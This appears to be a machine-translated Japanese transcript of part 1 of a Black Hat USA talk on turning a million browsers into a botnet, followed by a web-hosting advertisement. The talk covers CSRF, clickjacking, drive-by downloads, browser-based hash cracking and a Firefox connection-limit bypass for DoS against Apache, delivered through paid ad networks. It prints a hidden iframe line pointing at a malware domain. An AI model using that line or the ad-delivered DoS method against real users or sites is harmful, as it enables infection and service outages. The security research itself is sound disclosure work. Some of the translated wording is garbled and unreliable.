BLACK HAT USAカンファレンス。 100万のブラウザからのボットネット。 パート1

ジェレミー・グロスマン：皆様をお迎えできてうれしく思います。私たちはこのプレゼンテーションを6か月間準備してきましたので、できるだけ早く成果を共有できるよう努力しています。 Black Hatのスタッフ全員に招待してくれたことに感謝します。毎年ここに戻ってきて、このイベントが大好きです。 Black Hatをありがとう！ 今日のプレゼンテーションを楽しくしようとしますが、まずは自己紹介をしたいと思います。







私は、カリフォルニア州サンタクララのWhiteHat Securityの創設者であり、新製品開発マネージャーです。 当社には約300人の従業員がいます。



マットは、セキュリティリスク研究センターのマネージングディレクターです。 「白髪」の人々では、主にWebサイトへの侵入、それらの脆弱性の発見、および大規模でのこれに取り組んでいます。 しかし、まだ調査のための時間が残っているため、今日はブラウザのハッキングを開始し、それらを使用してサイトをハッキングし、Webセキュリティの完全なサイクルを示します。 私は2002年にここで最初に話しました。 ほとんどの場合、私たちの製品の開発とプレゼンテーションの研究をしています。



Matt Johansson：私はペネトレーションテスター（ペンテスター）として働いた経験があり、会社でハッキングサイトで仕事を始めました。その前に私自身ハッカーの軍隊を率いていたからです。 私はいくつかのクールな研究を行っており、多くのことをしていますので、私に連絡してください。







ジェレミー・グロスマン：では、パーティーを始めましょう。 今日、インターネットにアクセスしなかった人が少なくとも一人いるとは思いません。 たぶん今あなたはインターネットに接続していないかもしれませんが、家に帰るとここにいる全員とあなたが知っている誰もがブラウザを使ってインターネットとやり取りするでしょう。 これは私たちの日常生活の一部であり、これが何を意味するかを説明しますが、インターネットは主に機能するように設計されています。 私たちはインターネットをハッキングせず、私たち自身の目的のためにそれを使用しようとします。



Webページにアクセスするとき、使用するブラウザは関係ありません-Chrome、Firefox、Safari、IE、Opera、いずれの場合も、インターネットは、このページにいる間、または次のブラウザを探しているときにブラウザを完全に制御するように動作しますページ。



このページのJavaScriptまたはフラッシュにより、ブラウザーは何でも実行できます。インターネットまたはイントラネットのどこからでも、要求に対するあらゆるタイプの応答が可能です。 これには、CSRF-偽のクロスサイトリクエスト、XSS-クロスサイトスクリプティング、クリックジャッキング、およびブラウザを制御できるようにする他の多くのトリックが含まれます。



ここで、ブラウザのセキュリティとは何かを理解しようとしますが、主なアイデアは、パッチがないゼロデイエクスプロイトを使用せずにブラウザ制御の一般的なアイデアを得ることです。



Matt Johanson： XSSについて何も知らない場合は、XSSについてお問い合わせください。



Jeremy Grossman：次に、HTMLまたは悪意のあるJavaScriptを使用するブラウザー攻撃について簡単に説明します。

• ブラウザ調査ブラウザのポーリング
• 偽のクロスサイトリクエスト、ログイン検出ログイン認識、匿名化、
  
  イントラネットのハッキング
  
  自動クロスサイトスクリプティング
  
  ドライブバイダウンロード方式を使用してダウンロードするときにユーザーのコンピューターに入る従来のマルウェア。
  
  ブルートフォースハッシュクラッキング。
  
  アプリケーションレベルでのDDoS攻撃。
  
  
  
  
  
  
  
  
  
  このスライドには、ブラウザ調査のサンプルが表示されています。これは、別のサイトにアクセスしたときにブラウザ内にとどまるJavaScriptにすぎません。 これはCNNのスクリーンショットです。 彼らのサイトにアクセスすると、そこにあるメトリックがブラウザに接続され、完全な調査を実行し、視聴に関するすべての情報を受け取ります：あなたが持っているブラウザ、バージョン、接続されているプラ​​グイン、OS。 誰が自分のサイトを訪問したかを知りたいので、彼らはこれをします。 現在、これは非常に一般的な技術です。
  
  
  
  次に、より高度な技術であるクロスサイトJavaScript偽造を検討してください。 多くの労力を必要とせず、悪意のあるスクリプトを実行する必要はありません。JavaScriptまたはHTMLを使用するブラウザを使用して、他のサイトにハッキングするだけです。 CSRFは、Googleの検索履歴を使用して、ブラウザに違法コンテンツのアップロードまたはダウンロードを強制し、銀行振込を開始します。銀行のウェブサイトで個人アカウントにログインすると、不快なメッセージを送信するか、エドスノーデンに年間最優秀者として投票するように強制されます。
  
  
  
  Matt Johansson： CSRFは、ジャスティンビーバーのヒット曲をダウンロードするだけでなく、児童ポルノもダウンロードするように強制することができます。
  
  
  
  Jeremy Grossman：したがって、スライドの最初の行はブラウザーに他のサイトに悪意のあるコンテンツを挿入するように強制します。つまり、ハッカーになり、2番目にトレントをダウンロードさせ、あらゆる種類のDMCAライセンスに違反する海賊になります。ジャスティンビーバー、4番目-いくつかのサイトに投票します。
  
  
  
  
  
  
  
  以下は、ログイン検出ログインの認識です。これは、弊社が管理するサイトにアクセスしたときです。 Google、Facebook、Twitter、Linkedinのアカウントにログインしていることがわかります。 ブラウザから認証データを抽出するための6つの異なる技術があります。 私たちはあなたの好みを研究し、特定のユーザーを標的にした攻撃を実行します。
  
  
  
  
  
  
  
  別の攻撃はクリックジャッキングで、任意の画像またはボタンをクリックするとすぐにデータを明らかにすることができます。 TwitterまたはFacebookにログインし、踊っている猫の画像が気に入ったとします。 無害なものをクリックしますが、実際にはこれらのボタンのいずれかをクリックしてデータを表示します。 ワンクリック-あなたの名前、場所、私たちはあなたがTwitterやLinkedInであなたのプロフィールに投稿したデータを知っています。
  
  
  
  
  
  
  
  Matt Johanson：一部の企業はそのような追跡に従事しています。なぜなら、あなたの氏名は、彼らの商品やサービスのターゲットを絞った広告にとって非常に価値があるからです。
  
  
  
  Jeremy Grossman：これまでのところ、よく知られていること、少なくとも有名なBlack Hatの聴衆を見てきました。 また、ネットワーク接続を提供するDSLルーターにHTTP経由で悪意のあるJavaScriptを注入することにより、イントラネットイントラネットを破壊することにも気づいています。
  
  
  
  
  
  
  
  これは2006年に最初に発見され、これまでのところこの脆弱性は修正されていません。 さらに、iframeを使用すると、悪意のあるXSSコードの注入が実行される「自動クロスサイトスクリプティング」攻撃のタイプがあります。これにより、Cookie、保存されたパスワードなどを盗むことができます。 これは、主にメールプロバイダーのポータルを介して行われます。
  
  
  
  
  
  
  
  最後に、次の行を挿入することにより、ドライブバイダウンロード方式を使用して従来のマルウェアをダウンロードできます。
  
  
  
  

  <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
        
        
  
          
          
          
        
  
      
          
          
          
        
        
  
          
          
          
        
  
      
       

  
  
  その結果、ブラウザが感染したサイトに送信されて悪意のあるコンテンツがダウンロードされ、コンピューターが制御されます。 ここで、攻撃の対象はブラウザ自体またはその拡張機能である可能性があります。これらの攻撃は主にボットネットネットワークを作成するために使用されます。この脅威を回避するには、パッチを適時にインストールする必要があり、Javaを完全に削除することをお勧めします。 簡単に言えば、これらはこの講演で焦点を当てる攻撃方法です。
  
  
  
  Matt Johanson：ジェレミーは、過去のBlackHatカンファレンスですでに言及されたことについて話しました。 JavaScriptを使用してパスワードを解読する分散コンピューティングに焦点を当てた別の研究についてお話したいと思います。 簡単に記述でき、非常に高速に動作するため、これは素晴らしいことです。 Lavakumar Kuppanの調査によると、彼が発明した指標では、このJavaScriptを配布できる場合、JavaScriptを使用して1秒あたり10万MD5ハッシュを実際にハッキングまたはクラッキングしようとすることができます。
  
  
  
  次のスライドは、JavaScriptベースのRavan分散コンピューティングシステムがどのように機能するかを示しています。このシステムは、ブルートフォース攻撃を使用して複数のブラウザーでハッシュを攻撃できます。
  
  
  
  HTML5を使用して、WebWorkersのバックグラウンドでJavaScriptを実行します。これには、単一のパスワード推測ネットワークでブラウザーが開かれている多くのコンピューターが含まれます。 特定のハッシュに一致するユーザーパスワードを検出し、1秒あたり60〜70,000個のパスワードからソートします。これには12人のWebWorkerが使用されます。
  
  
  
  
  
  
  
  これは非常に高速な処理であり、後ほどその配布方法に焦点を当てます。 この問題に加えて、数か月間、サービス障害（DoS）を引き起こすアプリケーションを真剣に研究してきました。 ブラウザは、WebWorkersのCORを使用して、驚くほど多数のGET要求をリモートサイトに送信できます。 調査中、1ブラウザーから1分あたり約10,000件のリクエストを送信できることがわかりました。 同時に、ブラウザーは多くのTCP接続を開いたままにせず、単に多くのHTTP要求を同期的に開始します。 単一のブラウザーと、1つのサイトを対象とした複数のブラウザーの両方を使用できます。 ただし、接続数を増やすことで、いつでも攻撃の強度を高めることができます。
  
  
  
  Jeremy Grossman：接続に関するブラウザの制限についてお話します。
  
  
  
  
  
  
  
  Browserscopeというツールは、特定のブラウザーまたは特定のブラウザーバージョンが一度にサポートできる接続の数を示します。 すべてのブラウザーは、同じホスト名で6つ以下の接続をサポートします。たとえば、IEバージョン8および9の最大接続数は35に達します。各ブラウザーでは、サイトにアクセスするため、セキュリティではなく安定性とパフォーマンスのために接続数に制限があります、リクエストを送信すると、ブラウザがコンテンツのダウンロードを開始します。
  
  
  
  これらのインジケータを確認したところ、ほとんどのブラウザは実際に6で動作し、最大7つの接続を提供していると言えます。 次のスライドは、さまざまなブラウザーのパフォーマンスをテストし、サーバーへの多数の同時接続を作成するBrowserscopeの操作を示しています。 この場合、Firefoxには6つの安定した接続がありました。
  
  
  
  ただし、一部のブラウザーではこの制限を回避できます。テストでは、Firefoxを使用してサービス障害を引き起こしました。 次のスライドは、Apache Killerスクリプトを示しています。これは、ブラウザーの制限を回避し、サーバーへの同時リクエストのストリームを作成し、同時に開く接続の数を6から300に増やしました。
  
  
  
  
  
  
  
  ここではHTTPプロトコルを使用しましたが、ポート80でFTPを使用すると、接続数が400に増加し、これにより実際にApacheサーバーを「殺す」ことができます。
  
  
  
  Matt Johanson：ここでの重要な違いは、HTTPプロトコルを使用できないFTPを使用してこれを行ったことです。 そのため、リストの先頭から多くのポジションをチェックできず、多くのCSRアプリケーションを実行できませんでした。 これらは私たちが同時に開こうとした接続です。したがって、これは非常に伝統的なDoS攻撃ではありません。
  
  
  
  Jeremy Grossman：これからラップトップでApacheサーバーを実行します。これはApache 2.4.4の単純な「バニラ」バージョンで、すべての基本設定がデフォルトでインストールされており、大きな影響はありません。
  
  
  
  
  
  
  
  最初のサイクルに焦点を当てます。ここでは、サーバーに画像リクエストを大量にインストールします。リクエストの送信方法を確認し、サーバーが3秒間応答しないと、画像が連続して読み込まれ始めます。
  
  
  
  Matt Johanson：これはブラウザのパフォーマンスの側面であり、セキュリティの側面ではありません。 セキュリティを損なうために悪用する可能性があります。数分後に表示されます。 しかし、このアクションのポイントは、これらすべてのイメージを同時にダウンロードすることです。
  
  
  
  Jeremy Grossman：サーバーのステータスを忘れていました。左下の画面で、ブラウザーウィンドウ用とアップロードされた6つの画像用の6つの接続が同時に開いていることがわかります。 これは非常に重要です。これは、この特定のブラウザで接続の上部境界線を壊そうとしているためです。 ここで、接続値を0に設定してこれらの接続を強制終了し、Firefoxで制限をバイパスする方法を示します。
  
  
  
  同じホスト名に対してFTPを使用して、これを最大100接続まで単純にループします。 FTPであり、HTTPを送信しないため、これらはすべてURLを必要としません。 左下隅を見てください-サーバーのステータスが変更され、100接続、100ページが表示されています。 次に、400の接続に進みましょう。
  
  
  
  ページは1秒ごとに更新され、接続数が270に達すると、サーバーは「パニック」に陥り、それ以上のリクエストを処理する時間がありません。 このコードをWebページにアップロードするだけで、Apacheは同時オープン接続の数を300にしようとします。そして、これをすべて単一のブラウザーで行います。
  
  
  
  バックグラウンドで、別のスクロールが表示されます。Amazonに別のシステムがあります。これはAWSシステムです。 私は今、DoS攻撃で彼女を殺したくないので、デモの別のオプションを提供しました。
  
  Matt Johansson：これで、少なくともFirefoxでできることはわかりました。 これは従来のサービス拒否攻撃ではなく、ボットネットはここでは使用されません。 まだいくつかの可能性がありますが、一般に、この攻撃方法でハッキングする利点は次のとおりです。
  
  
  
  
  • マルウェア、エクスプロイト、ゼロデイ攻撃は必要ありません。
  • 痕跡、不安、ブラウザのキャッシュの禁止、
  • デフォルトでは、ブラウザはこの攻撃に対して脆弱です。
  • 実装は非常に簡単で、コードがどれほどシンプルに見えるかを自分で見ました。
  • 私たちが言うように-それは動作するはずの方法で動作します。 インターネットは、この方法で機能するように設計されている可能性があります。つまり、複数の画像ができるだけ早くダウンロードされるようにする必要があります。
  
  
  したがって、誰がこの問題を解決できるかわかりません。 悪意のあるJavaScriptコードを使用してこの攻撃方法を広める問題に焦点を当てましょう。 電子メールの送信など、スパマーが使用する従来の方法は考慮しません。 通常のユーザーによる分布、つまり通常のユーザーの観点からのスケーリングを検討してください。
  
  
  
  
  • 所有している大量のトラフィックを持つサイト（ブログ、ソフトウェアなど）の使用。
  • 人気のあるサイト、フォーラムなどでのHTMLインジェクション
  • Wi-Fiルーターを介した「中間者」方式。
  • 検索エンジンの「中毒」。
  • SQLワームの大量注入によるサイトのハッキング。
  • サードパーティのウィジェット（天気、カウンター、トラッカーなど）。
  
  
  ダグラス・クロックフォードは、「悪意のあるコードを挿入する最も信頼性が高く、費用対効果の高い方法は、広告を購入することです」と述べました。 したがって、インターネット上には広告ネットワークがたくさんあるため、広告ネットワークの仕組みを検討します。 次のスライドは、広告の独特なエコシステムを示しています。
  
  
  
  
  
  
  
  そのため、一番上には、広告主がまず何かを表示する必要があることがわかります。たとえば、日付の花の花束などです。 彼らはそれにお金を使いますが、最終的な消費者に商品を届けるためにサイトが必要です。 ブログ、ニュース、ソーシャルネットワーク、レビュー、多くのユーザーがアクセスする人気サイトなどの情報の発行者であるマスディストリビューターを手に入れたいと考えています。 広告主と出版社の間には、広告ネットワークと呼ばれる橋があります。 これらのネットワークに情報を投稿するのにお金を費やします。画像、ポップアップバナー、JavaScriptなど、見たいものは何でもかまいません。 あなたはスライドの下部にある小さな青い数字です。
  
  
  
  Matt Johansson：今朝、私たちはTMZウェブサイトに行き、そこでこの素晴らしいスクリーンショットを撮りました。
  
  
  
  
  
  
  
  ページの一番上と右下に広告ユニットが表示されます。
  
  
  
  Jeremy Grossman：表示されるすべての広告ユニットは、TMZ Webサイトユーザーの目の前にあるJavaScriptコードであり、お金を稼ぐために注目を集めています。 そのような広告ネットワークは数百と数百ありますが、スライドの右上隅にある当社のロゴの画像は広告ネットワークではないことに注意してください！ これらのネットワークにはJavaScriptを使用するものと使用しないものがあります。
  
  
  
  そこで、ある広告ネットワークの所有者に、サードパーティの広告JavaScriptをシステムに配置したいという手紙を書きました。 そのうちの1人が、文字通り数分で非常に迅速に私に答えました。 彼は、そのようなコードは、DoubleClickなどの有名で有名な企業からのみ投稿できるようにしており、信頼できるものであり、潜在的な脆弱性についてすべての資料をスキャンしていると書いています。 そして、DFAなどのような大規模なサードパーティの広告サーバーを使用している場合、彼らは私のJavaScriptをホストする機会を見つけるでしょう。
  
  
  
  
  
  
  
  従来の広告ネットワークはすべてこのように動作します。お金を支払い、いくつかの指標を取得して広告を掲載します。 私たちが遭遇した別のタイプのネットワークがあります。 このために問題が発生するかどうかわからないため、意図的に名前を付けません。
  
  
  
  
  
  
  
  これらのシステムはこのように機能します。夕方にコンピューターの前で家に座っている人に少しお金を払って、一定時間ブラウザでページを表示します。 それはあなたがペニーのためにブラウザ時間を購入することが判明します-この場合、1万分の視聴は約10.5ドルで購入できます。
  
  
  
  Matt Johansson：重要な状況は、この有料視聴方法がパスワードをクラックするために広く使用されていることです。 攻撃者はブルートフォース方式を使用してパスワードを解読したりログインしたりするのに多くの時間を必要とし、これらの広告ネットワークはブラウザーが広告を表示することを保証しませんが、広告がページに読み込まれるとすぐに実行される悪意のあるコードをキャッチしません。 あなたはそれを支払いますが、人がそこに1分、10分、2秒座っている場合、あなたがDoS攻撃に使用できるという事実にお金を払わないという保証はありません。
  
  
  
  ジェレミー・グロスマン：最後の行に注意してください-あなたは100万分の視聴を購入することができます、これは約2年のブラウザ時間であり、約650ドルです。 これは良い指標です！
  
  
  
  現在、インターネットは広告に取り組んでおり、1ペニーの価値があります。 アジェンダに戻って、最後の2種類の攻撃（ブルートフォースハッシュクラッキングとアプリケーションレベルのDDoS攻撃）に焦点を当てましょう。 ブラウザーで簡単に100万に拡張できるか、単純に650ドルを支払い、2年に相当する時間でパスワードのハッキングを開始できることがわかります。 いくつかのデモンストレーションを紹介しますが、最初に経済学についてお話ししましょう。
  
  
  
  Matt Johansson：議事録購入のこのスクリーンショットを見ましたが、広告ネットワークには独自の言語があり、私にとっては習得が容易ではありませんでした。 広告主はこれを「インプレッション」と呼びますが、特定のページに広告を表示するための有料サービスについて話します。 過去数か月間、価格は1,000インプレッションまたは広告インプレッションあたり約50セントのままでした。 CPCと1,000 CPMの価格タグがあります。
  
  
  
  
  
  
  
  したがって、私が「印象」と言うとき、ブラウザをボットとして想像する必要があります。まるであなたが一人の人を雇ってブラウザに広告をロードし、現時点でこのブラウザの制御を獲得したかのように。 したがって、彼らはそれを「印象」と呼び、私たちはそれを「ボット」と呼びます。
  
  
  
  Jeremy Grossman：悪者、クレジットカードを盗む本物の悪者がこれらの盗まれたカードを使用して広告分または「印象」を購入するのを妨げる障害はありません。
  
  
  
  Matt Johansson：次のスクリーンショットには、調査で使用した広告ネットワークの統計が表示されています。
  
  
  
  
  
  
  
  ダッシュボードの前で、ボタンをクリックして、このネットワークに広告を表示しようとしています。 広告は表示せず、ダミーだけを表示し、JavaScriptコードを実行しませんでした。 私たちは広告主として自分自身を試してみて、ユーザーと広告ネットワークの所有者にできるだけ見えないようにしようとしたので、彼らは私たちの平和なハッカーの方法を使用して私たち自身のウェブサーバーを指揮できるようにしました。 私たちの研究の数ヶ月間、私たちは10ドルも費やしませんでした。
  
  
  
  すべてのタイプの広告アイテムに毎日制限を設定できます。ユーザーが注目すべき特定のキーワードを選択し、広告が表示する視聴者、オペレーティングシステムまたはブラウザーの地理的位置を選択できます。ユーザーのモバイルまたは固定デバイスに広告を集中できます。
  
  
  
  できるだけ広い範囲の視聴者にリーチを選択し、キーワードとして「コンピューター」という言葉を選択しました。 初日は15回のクリックのみを購入し、結果として4ドル、つまり8326回の「インプレッション」がかかりました。 このような有益な投資により、24時間で8326ブラウザにコードをダウンロードできると想像してください！
  
  
  
  BLACK HAT USAカンファレンス。 100万のブラウザからのボットネット。 パート2
  
  
  
  
  
  ご滞在いただきありがとうございます。 私たちの記事が好きですか？ より興味深い資料を見たいですか？ 注文するか、友人に推奨することで、私たちをサポートします。私たちがあなたのために発明したエントリーレベルのサーバーのユニークな類似品のHabrユーザーのために30％割引： VPS（KVM）E5-2650 v4（6 Cores）10GB DDR4 240GB SSD 1Gbpsについて20ドルまたはサーバーを分割する方法？ （オプションはRAID1およびRAID10、最大24コア、最大40GB DDR4で利用可能です）。
  
  
  
  VPS（KVM）E5-2650 v4（6コア）10GB DDR4 240GB SSD 1Gbpsまで 6か月の期間を支払う場合は12月まで無料で 、 ここで注文できます 。
  
  
  
  Dell R730xdは2倍安いですか？ オランダと米国で249ドルからIntel Dodeca-Core Xeon E5-2650v4 128GB DDR4 6x480GB SSD 1Gbps 100 TVを2台持っているだけです！ インフラストラクチャの構築方法について読む クラスRは、1米ドルで9,000ユーロのDell R730xd E5-2650 v4サーバーを使用していますか？